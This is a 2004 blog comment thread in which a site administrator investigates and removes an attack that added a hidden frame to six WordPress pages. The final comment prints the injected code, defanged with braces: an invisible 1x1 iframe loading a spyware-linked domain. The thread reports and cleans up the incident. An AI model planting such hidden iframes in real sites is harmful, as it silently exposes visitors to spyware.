7 comments for “Attacked by the forces of evil

  1. Ashleigh
    September 25, 2004 at 5:01 pm

    yes! It’s killing me!

  2. Jack
    September 25, 2004 at 5:09 pm

    Yes! It started this morning while lurking at T&S. It’s only one ad so far.

  3. September 25, 2004 at 5:25 pm

    Kaimi, I can’t even type without Internet Explorer security windows popping up asking me if I want to trust some pretty bogus stuff.

  4. Kaimi
    September 25, 2004 at 5:38 pm

    I’ve located the problem.

  5. Kaimi
    September 25, 2004 at 5:47 pm

    It’s gone. Someone modified six files this afternoon (at 1:51 to be exact, just about four hours ago). All six files had a hidden frame installed on them, directing to the very dubious site “re6” dot net.

    The affected files were index.php, index.default.php, wp-comments-popup.php, misc.php, guests.php, and categories.php.

    The most damaging two were index and wp-comments-popup.

    I’m very curious as to how that bit of code got onto the site. Something stinks in Denmark. Perhaps someone with admin access is infected with something. More ominously, perhaps there’s a secuity hole in WP. The program’s choice of files is decidedly odd. Several of them are pages that only exist at T & S (like guests.php) so it may not be a program designed to sneak into wp. I really don’t know how we got hit, but in any case, it should be gone now.

  6. Kaimi
    September 25, 2004 at 5:48 pm

    By the way, the spyware was directing to iwantsearch, a known spyware scum site.

  7. Kaimi
    September 25, 2004 at 5:56 pm

    The code snippet that was inserted (right before the /body tag) was this: (replacing the greater-than and less-than signs with {} because I don’t want to put actual code here):

    {div style=”visibility: hidden; position: absolute; left: 1; top: 1″} //

    {iframe src=”http://re6.net/?s=1″ frameborder=0 vspace=0 hspace=0 width=1 height=1 marginwidth=0 marginheight=0 scrolling=no} //

    {/iframe}{/div} //

Comments are closed.